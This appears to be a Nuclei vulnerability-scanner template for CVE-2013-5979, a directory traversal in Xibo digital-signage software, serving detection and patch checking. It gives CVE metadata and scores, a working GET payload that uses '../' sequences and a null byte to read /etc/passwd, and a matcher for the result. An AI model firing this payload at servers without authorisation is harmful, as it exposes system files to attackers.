46 lines
1.7 KiB
YAML
46 lines
1.7 KiB
YAML
id: CVE-2013-5979
|
|
|
|
info:
|
|
name: Xibo 1.2.2/1.4.1 - Directory Traversal
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
|
|
impact: |
|
|
An attacker can read arbitrary files on the server.
|
|
remediation: |
|
|
Upgrade to a patched version of Xibo.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/26955
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2013-5979
|
|
- https://bugs.launchpad.net/xibo/+bug/1093967
|
|
- http://www.baesystemsdetica.com.au/Research/Advisories/Xibo-Directory-Traversal-Vulnerability-(DS-2013-00
|
|
- http://www.baesystemsdetica.com.au/Research/Advisories/Xibo-Directory-Traversal-Vulnerability-%28DS-2013-00
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2013-5979
|
|
cwe-id: CWE-22
|
|
epss-score: 0.07984
|
|
epss-percentile: 0.94272
|
|
cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: springsignage
|
|
product: xibo
|
|
tags: cve2013,cve,lfi,edb,springsignage
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100be02fdac786e491610190b50099a0ce87960337c3a64fadd06f6408ebb147fd4022100b3295a49e65f499266d917bc52808ccfae6264f6b448c06983015d0c26d25b51:922c64590222798bb761d5b6d8e72950 |